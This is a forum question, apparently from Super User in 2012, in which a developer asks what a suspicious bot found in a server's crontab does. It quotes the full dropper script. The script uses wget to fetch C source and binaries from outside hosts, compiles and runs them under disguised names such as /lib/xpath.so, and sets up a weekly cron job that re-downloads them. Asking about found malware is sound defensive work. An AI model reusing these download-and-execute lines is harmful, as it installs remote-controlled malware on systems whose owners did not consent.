Is SecureShellz bot a virus? How does it work?
Posted
by
ProGNOMmers
on Super User
See other posts from Super User
or by ProGNOMmers
Published on 2012-07-06T09:08:55Z
Indexed on
2012/07/06
9:18 UTC
Read the original article
Hit count: 1183
I'm using a development server in which I found this in the crontab:
[...]
* * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1
@weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd
[...]
http://stablehost.us/bots/regular.bot contents are:
#!/bin/sh
if [ $(whoami) = "root" ]; then
echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make
echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make
pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc
wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c
wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1
wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2
exit 1
fi
wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php
wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa
wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_
I cannot contact the sysadmin for various reasons, so I cannot ask infos about this to him.
It seems to me this script downloads some remote C source codes and binaries, compile them and execute them.
I am a web developer, so I am not an expert about C language, but watching at the downloaded files it seems to me a bot injected in the cron of the server.
Can you give me more infos about what this code does? About its working, its purposes?
© Super User or respective owner
